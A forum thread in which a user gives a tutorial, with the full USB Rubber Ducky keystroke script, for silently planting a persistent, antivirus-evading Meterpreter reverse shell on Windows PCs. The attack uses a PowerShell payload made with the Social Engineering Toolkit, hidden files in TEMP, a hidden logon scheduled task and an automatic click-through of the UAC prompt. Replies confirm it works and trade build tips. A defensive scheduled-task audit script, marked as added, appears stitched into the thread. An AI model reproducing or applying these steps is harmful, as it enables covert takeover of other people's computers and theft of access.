Archived

This topic is now archived and is closed to further replies.

chaz

Hidden/Undetected/Reboot persistent Meterpreter in under 5 seconds w/Smart privilege escalation

Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the Twin Duck firmware, so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET Framework 4.5, but PCs with Win 8+ will have this by default and loads of applications use this, so the likelihood of a PC pre-Win 8 not having it is fairly low (I might make a native payload later).

 

What the executable does:

-  Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user.

-  Depending on privilege level, either continue execution or attempt to elevate.

-  (If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y'.)

-  Copies itself and the required DLLs to the default TEMP directory, and sets all of those files to be hidden.

-  Creates a hidden Task Scheduler task which runs the executable on each user logon.

-  Executes the encoded PowerShell payload.

 

Why smart privilege checking is important:

If a completely non-privileged user were to execute the program and it asked for UAC anyway, then a prompt like this would appear:

[screenshot: UAC credential prompt]

This is obviously problematic; in this circumstance we would rather our payload run with normal privileges, because non-privileged access is better than no access, right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script, so this prompt is never displayed and instead we get a normal user-level Meterpreter shell. Now if a user is part of the admin group then we see a dialog like this:

[screenshot: UAC consent prompt]

This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use Meterpreter's 'getsystem' command and we're away!

Tutorial:

What you'll need:

-  Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft).

-  Linux-based PC/VM for generating our payload and listening for connections. Preferably Kali Linux, as we will be using S.E.T (Social Engineering Toolkit) to generate our PowerShell payload.

-  USB Rubber Ducky (with Twin Duck or similar firmware installed)

-  This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (unzip it on your Windows PC/VM first)

 

Let's start:

-  On the Kali Linux side of things, let's open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'.

-  You will be presented with various options, hit '1' and then enter.

-  Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter.

-  More options, hit '1' and then enter.

-  Give it your local IP (or external IP if you want a connection from outside your local network; this would require port-forwarding).

-  Give it a port and then say 'yes' when it asks if you want to start the listener.

-  Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/'

-  You have just started a webserver on port 80. Navigate over there in your Windows PC's web browser with the file name in the path, like so: '192.168.0.XXX/x86_powershell_injection.txt'

You should be faced with this screen:

[screenshot: payload text shown in the browser]

-  Select all the text and copy it.

-  Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file:

[screenshot: Open Project dialog]

-  Go to the line with the pre-inserted PowerShell payload (Line 64):

[screenshot: the payload line in the source]

-  Replace the text within the double quotes with the payload you got from the web server earlier.

-  Go to the Build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU'; if not, just change them.

-  Navigate to the path it gives at the bottom in the console window to find the DLLs and exe file we need.

-  Plug your Ducky's micro SD card into your PC and copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' and 'JetBrains.Annotations.dll' to your ducky drive.

-  Now we need our ducky payload, here is the code:

REM Awesome script
DELAY 500
GUI R
DELAY 50
STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe"
DELAY 50
ENTER
DELAY 1500
ALT Y
DELAY 1000
STRING exit
DELAY 50
ENTER
DELAY 50
STRING exit
DELAY 50
ENTER

-  Generate your inject.bin file with an encoder.

-  Copy the inject.bin to your Ducky's drive and there we have it!

 

Some caveats:

-  The 'PSExec.exe' file is totally undetected by antiviruses, but if an antivirus wants to scan the file before running it, it may interfere with the ducky script.

-  Slower PCs may need slightly longer delays in the ducky script, but hey, just experiment until it works!

 

So tell me what you think, feedback is greatly appreciated!


I should add, since we are using Windows Task Scheduler, if we do get elevated privileges, when the user reboots and the 'PSExec.exe' file auto runs it will run as Admin and no UAC prompt will be shown because technically when we added the Task we were admin :)

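An added defensive check, not part of chaz's project or anything posted in the thread: a PowerShell audit that lists logon-triggered scheduled tasks showing the traits described above (task marked hidden, binary under a TEMP directory or carrying the Hidden file attribute, PowerShell launched with an encoded command) and reports the principal and run level, since a task registered while elevated runs elevated at logon without a UAC prompt. The task name 'Update' is assumed as the watch-list default because it is the name given later in the thread; adjust it if the build was changed.

```powershell
# Added example: audit logon-triggered scheduled tasks for the persistence traits
# discussed in this thread. Needs the ScheduledTasks module (Windows 8 / Server
# 2012 and later); run elevated so tasks registered by other users are listed too.
function Find-SuspiciousLogonTask {
    param(
        # Assumed watch-list name (the thread says the task is called "Update").
        [string[]]$KnownNames = @('Update')
    )
    foreach ($task in Get-ScheduledTask) {
        $logon = $task.Triggers |
            Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' }
        if (-not $logon) { continue }   # only logon-triggered persistence is of interest
        $reasons = New-Object System.Collections.Generic.List[string]

        if ($task.Settings.Hidden) { $reasons.Add('task is marked hidden') }
        if ($KnownNames -contains $task.TaskName) {
            $reasons.Add("task name '$($task.TaskName)' is on the watch list")
        }
        foreach ($action in $task.Actions) {
            if ($action.CimClass.CimClassName -ne 'MSFT_TaskExecAction') { continue }
            $exe    = "$($action.Execute)".Trim('"')
            $argStr = "$($action.Arguments)"
            if ($exe -match '(?i)\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%TEMP%|%TMP%') {
                $reasons.Add("executes from a TEMP directory: $exe")
            }
            # -Force is required, otherwise Get-Item skips files with the Hidden attribute
            $file = Get-Item -LiteralPath $exe -Force -ErrorAction SilentlyContinue
            if ($file -and (($file.Attributes -band [IO.FileAttributes]::Hidden) -ne 0)) {
                $reasons.Add("executable has the Hidden attribute: $exe")
            }
            # powershell.exe accepts -e / -ec / -enc as abbreviations of -EncodedCommand
            if ("$exe $argStr" -match '(?i)powershell' -and
                $argStr -match '(?i)(^|\s)-e(c|nc|ncodedcommand)?\s') {
                $reasons.Add('runs PowerShell with an encoded command')
            }
        }
        if ($reasons.Count -gt 0) {
            [PSCustomObject]@{
                Task     = "$($task.TaskPath)$($task.TaskName)"
                RunsAs   = $task.Principal.UserId
                RunLevel = $task.Principal.RunLevel  # 'Highest' = elevated at logon, no UAC prompt
                Reasons  = $reasons -join '; '
            }
        }
    }
}

Find-SuspiciousLogonTask | Format-List
```

A task that matches can be removed with Unregister-ScheduledTask, after confirming it is not a legitimate updater with the same name.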

The payload works (except I had to change the PowerShell execution to use Process, not the PowerShell, because Win7 threw an exception right there). I also modified the PSExec a little bit. payload.txt does contain the part after -EncodedCommand so you can swap the payload easily without needing to recompile the PSExec every time, which may not be possible every time.

Thanks, nice idea :) It works as expected; you will get Sys Privs easily (except for Win10, which may be an MSF problem) and the payload stays persistent with SysPrivs after reboot.

Nice work ;)

 

3 hours ago, Shonenx333 said:

The payload works (except I had to change the PowerShell execution to use Process, not the PowerShell, because Win7 threw an exception right there). I also modified the PSExec a little bit. payload.txt does contain the part after -EncodedCommand so you can swap the payload easily without needing to recompile the PSExec every time, which may not be possible every time.

Thanks, nice idea :) It works as expected; you will get Sys Privs easily (except for Win10, which may be an MSF problem) and the payload stays persistent with SysPrivs after reboot.

Nice work ;)

 

Good to hear! Glad you got it working on Windows 7, and yeah, having the script as an external resource to load at runtime is probably a better idea! Interestingly I had no issues with System Privs and Windows 10; I just executed 'getsystem' in my Meterpreter prompt and I got elevated (even after reboot).

 

Thanks for your kind words :)


This looks solid. I compiled the program and will try it out on my ducky later! A small pro tip: you need to escape quotation marks if they appear in your script. Like so:

pInstance.AddScript("powershell -w 1 -C \"sv SS...." 

Or it won't compile correctly.

 

 

Thanks for this. I will update later.

1 hour ago, mrdeep said:

This looks solid. I compiled the program and will try it out on my ducky later! A small pro tip: you need to escape quotation marks if they appear in your script. Like so:


pInstance.AddScript("powershell -w 1 -C \"sv SS...." 

Or it won't compile correctly.

 

 

Thanks for this. I will update later.

Yeah, definitely, though all the PowerShell scripts that I've generated with S.E.T don't have any quotation marks; but for non-programmers, a very good tip!


Everything works except the persistence. Can't get that to work for some reason. Do you know how to fix this?

Nice script though chaz!!

4 hours ago, henna3 said:

Everything works except the persistence. Can't get that to work for some reason. Do you know how to fix this?

Nice script though chaz!!

The reboot persistence? I don't mean that if a session dies it will come back to life; it will just execute again when rebooted. If you could check Task Scheduler to see if a task is created and get back to me, that would be awesome! And thanks btw :)


Sir,

I have tried this payload on my computer.

Can I please know how to remove the persistence?

Thanks!

27 minutes ago, qwe3 said:

Sir,

I have tried this payload on my computer.

Can I please know how to remove the persistence?

Thanks!

Go to Windows Task Scheduler and delete the task "Update".


Thanks, sir.

There's one problem.

After PSExec.exe has started, it says Windows PowerShell has stopped working.

Output:

1>------ Build started: Project: PSExec, Configuration: Release Any CPU ------
1>C:\Program Files (x86)\MSBuild\12.0\bin\Microsoft.Common.CurrentVersion.targets(1697,5): warning MSB3088: Could not read state file "obj\Release\PSExec.csprojResolveAssemblyReference.cache". Unable to find assembly 'Microsoft.Build.Tasks.Core, Version=14.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'.
1>  PSExec -> C:\Users\xxx\Desktop\PSExec\PSExec\bin\Release\PSExec.exe
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ==========
 

On 10/16/2017 at 9:43 AM, dacrydium said:

Hi,

Thank you for this project, but the link for the Visual Studio project is dead; can you reupload it please?

q8


I can successfully compile the project using the instructions above. It outputs the file PSExec.exe successfully, yet it doesn't output the files Microsoft.Win32.TaskScheduler.dll and JetBrains.Annotations.dll. Shouldn't they be in the same folder as the newly made PSExec? Anybody still using this method who can help?
